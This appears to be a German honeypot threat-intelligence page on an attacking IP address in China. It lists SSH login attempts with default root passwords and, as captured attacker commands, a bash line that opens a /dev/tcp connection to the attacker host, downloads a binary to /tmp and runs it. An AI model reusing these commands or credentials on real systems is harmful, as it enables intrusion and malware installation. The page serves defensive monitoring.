Aktive Bedrohung • NIEDRIG
39.98.65.129
Herkunftsland🇨🇳 China
Erste Erkennung10.1.2026
Letzte Aktivitat10.1.2026
ISPHangzhou Alibaba Advertising Co.,Ltd.
🎯
14
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
2
Malware
Geolokalisierung
- Land
- 🇨🇳 China
- Stadt
- Beijing
- ASN
- AS37963
- ISP
- Hangzhou Alibaba Advertising Co.,Ltd.
Angriffsarten
cowrie
Angegriffene Ports
22
Zugehorige Malware
Versuchte Anmeldedaten
🔐root/123456
1x🔐root/password
1xAusgefuhrte Befehle
$
nohup bash -c "exec 6<>/dev/tcp/39.98.65.129/60119 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/MAZipcU7v3 && chmod +x /tmp/MAZipcU7v3 && /tmp/MAZipcU7v3 8fgu+Prs9zXv8/D4Ovfy8/A5AMQCBcIF" &1x$
dd bs=1 count=1911588 > /tmp/Gu0ToWG5821x$
>D6@/XJ'81x$
nohup bash -c "exec 6<>/dev/tcp/39.98.65.129/60119 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/MAZipcU7v3 && chmod +x /tmp/MAZipcU7v3 && /tmp/MAZipcU7v3 8fgu+Prs9zXv8/D4Ovfy8/A5AMQCBcIF" &0O0O6(6(Qtd?UPX!1xRisikobewertung
25
/100
NiedrigMittelHochKritisch